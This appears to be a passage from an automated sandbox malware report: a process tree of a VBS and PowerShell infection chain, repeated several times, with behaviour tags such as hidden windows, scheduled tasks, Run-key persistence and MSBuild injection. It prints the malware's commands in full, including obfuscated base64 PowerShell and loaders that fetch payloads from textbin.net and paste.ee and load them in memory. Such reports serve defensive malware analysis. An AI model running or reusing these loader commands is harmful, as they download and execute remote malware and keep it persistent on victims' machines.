        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:1460
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:5020
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:6096
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:3932
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3572
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:5896
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:2196
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:4540
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:1144
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:5920
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:5860
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:5880
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3352
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:3644
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2208
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:2916
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:4568
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:736
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:536
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:4504
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        
        PID:5588
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        
        PID:4680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
1⤵
- Hide Artifacts: Hidden Window
PID:5964
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  Powershell.exe -WindowStyle hidden "& 'C:\Users\Admin\AppData\Local\Temp\xx2.vbs' "
  2⤵
  - Suspicious use of AdjustPrivilegeToken
  PID:644
- - C:\Windows\System32\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\xx2.vbs"
    3⤵
    - Checks computer location settings
    PID:2200
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle hidden wscript.exe //b //nologo 'C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs'
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:3740
    - - C:\Windows\system32\wscript.exe
        
        "C:\Windows\system32\wscript.exe" //b //nologo C:\Users\Admin\AppData\Local\Temp\EncriptadoOOKK50.vbs
        5⤵
        Checks computer location settings
        
        PID:2952
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /delete /tn task name /f
        6⤵
        
        PID:2876
      - C:\Windows\System32\schtasks.exe
        
        "C:\Windows\System32\schtasks.exe" /create /tn task name /tr "C:\Users\Admin\AppData\Local\Temp\GLPd.vbs" /sc minute /mo minutos
        6⤵
        Scheduled Task/Job: Scheduled Task
        
        PID:3540
      - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★UwBl★HI★dgBp★GM★ZQBQ★G8★aQBu★HQ★TQBh★G4★YQBn★GU★cgBd★Do★OgBT★GU★YwB1★HI★aQB0★Hk★U★By★G8★d★Bv★GM★bwBs★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBO★GU★d★★u★FM★ZQBj★HU★cgBp★HQ★eQBQ★HI★bwB0★G8★YwBv★Gw★V★B5★H★★ZQBd★Do★OgBU★Gw★cw★x★DI★Ow★k★Ho★RgBL★GE★QQ★g★D0★I★★n★Gg★d★B0★H★★cw★6★C8★LwB0★GU★e★B0★GI★aQBu★C4★bgBl★HQ★LwBy★GE★dw★v★GU★egBq★G0★bwBm★Ho★MwBz★DY★Jw★g★Ds★J★BJ★GU★c★BH★FE★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DE★LgB0★Hg★d★★n★Ck★Ow★k★Hc★ZQBi★EM★b★Bp★GU★bgB0★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★UgBW★FU★W★B2★C★★PQ★g★CQ★dwBl★GI★QwBs★Gk★ZQBu★HQ★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★egBG★Es★YQBB★C★★KQ★g★Ds★J★BS★FY★VQBY★HY★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★Ek★ZQBw★Ec★UQ★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★JwBV★FQ★Rg★4★Cc★I★★t★GY★bwBy★GM★ZQ★g★Ds★J★BT★FQ★ZgBH★Gw★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DI★LgB0★Hg★d★★n★Ck★I★★7★CQ★U★Bo★HI★b★BO★C★★PQ★g★E4★ZQB3★C0★TwBi★Go★ZQBj★HQ★I★BT★Hk★cwB0★GU★bQ★u★E4★ZQB0★C4★VwBl★GI★QwBs★Gk★ZQBu★HQ★I★★7★CQ★U★Bo★HI★b★BO★C4★RQBu★GM★bwBk★Gk★bgBn★C★★PQ★g★Fs★UwB5★HM★d★Bl★G0★LgBU★GU★e★B0★C4★RQBu★GM★bwBk★Gk★bgBn★F0★Og★6★FU★V★BG★Dg★I★★7★CQ★R★BI★Ho★VQBB★C★★I★★9★C★★K★★g★Ec★ZQB0★C0★QwBv★G4★d★Bl★G4★d★★g★C0★U★Bh★HQ★a★★g★CQ★SQBl★H★★RwBR★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★★9★C★★J★BQ★Gg★cgBs★E4★LgBE★G8★dwBu★Gw★bwBh★GQ★UwB0★HI★aQBu★Gc★K★★g★CQ★R★BI★Ho★VQBB★C★★KQ★g★Ds★J★B1★FQ★b★BI★Ho★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FM★V★Bm★Ec★b★★g★C0★ZgBv★HI★YwBl★C★★Ow★k★E0★TwBE★FI★Zw★g★D0★I★★g★Cc★J★By★Hk★YQBl★Ec★I★★9★C★★K★BH★GU★d★★t★EM★bwBu★HQ★ZQBu★HQ★I★★t★F★★YQB0★Gg★I★★n★Cc★Jw★g★Cs★I★★k★FM★V★Bm★Ec★b★★g★Cs★I★★n★Cc★Jw★g★C0★RQBu★GM★bwBk★Gk★bgBn★C★★VQBU★EY★O★★p★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★QgB5★HQ★ZQBb★F0★XQ★g★CQ★RgB5★GY★Z★B6★C★★PQ★g★Fs★cwB5★HM★d★Bl★G0★LgBD★G8★bgB2★GU★cgB0★F0★Og★6★EY★cgBv★G0★QgBh★HM★ZQ★2★DQ★UwB0★HI★aQBu★Gc★K★★g★CQ★cgB5★GE★ZQBH★C4★cgBl★H★★b★Bh★GM★ZQ★o★Cc★Jw★k★CQ★J★★k★Cc★Jw★s★Cc★JwBB★Cc★Jw★p★C★★KQ★g★Ds★Jw★g★Ds★J★BN★E8★R★BS★Gc★I★★r★D0★I★★n★Fs★UwB5★HM★d★Bl★G0★LgBB★H★★c★BE★G8★bQBh★Gk★bgBd★Do★Jw★g★Cs★I★★n★Do★QwB1★HI★cgBl★G4★d★BE★G8★bQBh★Gk★bg★u★Ew★bwBh★GQ★K★★g★CQ★RgB5★GY★Z★B6★C★★KQ★u★Cc★I★★7★CQ★TQBP★EQ★UgBn★C★★Kw★9★C★★JwBH★GU★d★BU★Hk★c★Bl★Cg★I★★n★Cc★TQBp★HM★ZQBy★Gk★YwBv★HI★Z★Bp★G8★cwBv★EE★bQBl★G4★LgBD★Gw★YQBz★HM★MQ★n★Cc★I★★p★C4★RwBl★HQ★TQ★n★C★★Ow★k★E0★TwBE★FI★Zw★g★Cs★PQ★g★Cc★ZQB0★Gg★bwBk★Cg★I★★n★Cc★TQBz★HE★QgBJ★GI★WQ★n★Cc★I★★p★C4★SQBu★HY★bwBr★GU★K★★g★CQ★bgB1★Gw★b★★g★Cw★I★Bb★G8★YgBq★GU★YwB0★Fs★XQBd★C★★K★★g★Cc★Jw★w★C8★QgBo★HI★TgBT★Gs★VgB0★C8★cg★v★GU★ZQ★u★GU★d★Bz★GE★c★★v★C8★OgBz★H★★d★B0★Gg★Jw★n★C★★L★★g★Cc★Jw★l★Eo★awBR★GE★cwBE★GY★ZwBy★FQ★Zw★l★Cc★Jw★g★Cw★I★★n★Cc★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★F8★XwBf★C0★LQ★t★C0★LQ★t★C0★Jw★n★Cw★I★★n★Cc★M★★x★DM★N★★n★Cc★L★★g★Cc★Jw★x★Cc★Jw★s★C★★Jw★n★FI★bwBk★GE★Jw★n★C★★I★★p★C★★KQ★g★Ds★Jw★g★Ds★J★BW★EI★VwBX★Ho★I★★9★C★★K★★g★Fs★UwB5★HM★d★Bl★G0★LgBJ★E8★LgBQ★GE★d★Bo★F0★Og★6★Ec★ZQB0★FQ★ZQBt★H★★U★Bh★HQ★a★★o★Ck★I★★r★C★★JwBk★Gw★b★★w★DM★LgBw★HM★MQ★n★C★★KQ★g★Ds★J★BN★E8★R★BS★Gc★I★B8★C★★TwB1★HQ★LQBG★Gk★b★Bl★C★★LQBG★Gk★b★Bl★F★★YQB0★Gg★I★★k★FY★QgBX★Fc★eg★g★C★★LQBm★G8★cgBj★GU★I★★7★H★★bwB3★GU★cgBz★Gg★ZQBs★Gw★I★★t★EU★e★Bl★GM★dQB0★Gk★bwBu★F★★bwBs★Gk★YwB5★C★★QgB5★H★★YQBz★HM★I★★t★EY★aQBs★GU★I★★k★FY★QgBX★Fc★eg★g★Ds★';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('★','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Windows\system32\EncriptadoOOKK50.vbs');powershell $Yolopolhggobek;
        6⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2136
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$zFKaA = 'https://textbin.net/raw/ezjmofz3s6' ;$IepGQ = ( [System.IO.Path]::GetTempPath() + 'dll01.txt');$webClient = New-Object System.Net.WebClient ;$RVUXv = $webClient.DownloadString( $zFKaA ) ;$RVUXv | Out-File -FilePath $IepGQ -Encoding 'UTF8' -force ;$STfGl = ( [System.IO.Path]::GetTempPath() + 'dll02.txt') ;$PhrlN = New-Object System.Net.WebClient ;$PhrlN.Encoding = [System.Text.Encoding]::UTF8 ;$DHzUA = ( Get-Content -Path $IepGQ ) ;$uTlHz = $PhrlN.DownloadString( $DHzUA ) ;$uTlHz | Out-File -FilePath $STfGl -force ;$MODRg = '$ryaeG = (Get-Content -Path ''' + $STfGl + ''' -Encoding UTF8);' ;$MODRg += '[Byte[]] $Fyfdz = [system.Convert]::FromBase64String( $ryaeG.replace(''$$$$'',''A'') ) ;' ;$MODRg += '[System.AppDomain]:' + ':CurrentDomain.Load( $Fyfdz ).' ;$MODRg += 'GetType( ''MisericordiosoAmen.Class1'' ).GetM' ;$MODRg += 'ethod( ''MsqBIbY'' ).Invoke( $null , [object[]] ( ''0/BhrNSkVt/r/ee.etsap//:sptth'' , ''C:\Windows\system32\EncriptadoOOKK50.vbs'' , ''____________________________________________-------'', ''0134'', ''1'', ''Roda'' ) ) ;' ;$VBWWz = ( [System.IO.Path]::GetTempPath() + 'dll03.ps1' ) ;$MODRg | Out-File -FilePath $VBWWz -force ;powershell -ExecutionPolicy Bypass -File $VBWWz ;"
        7⤵
        Blocklisted process makes network request
        Suspicious use of AdjustPrivilegeToken
        
        PID:4828
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -File C:\Users\Admin\AppData\Local\Temp\dll03.ps1
        8⤵
        Blocklisted process makes network request
        Drops startup file
        Suspicious use of SetThreadContext
        Suspicious use of AdjustPrivilegeToken
        
        PID:4844
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Set-ExecutionPolicy Bypass -Scope Process ; powershell -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        9⤵
        Command and Scripting Interpreter: PowerShell
        Suspicious use of AdjustPrivilegeToken
        
        PID:2852
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -file C:\Users\Admin\AppData\Local\Temp\xx1.ps1
        10⤵
        Adds Run key to start application
        Suspicious use of AdjustPrivilegeToken
        
        PID:5668
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe Copy-Item 'C:\Windows\system32\EncriptadoOOKK50.vbs' -Destination 'C:\Users\Admin\AppData\Local\Temp\'
        9⤵
        Suspicious use of AdjustPrivilegeToken
        
        PID:3216
        
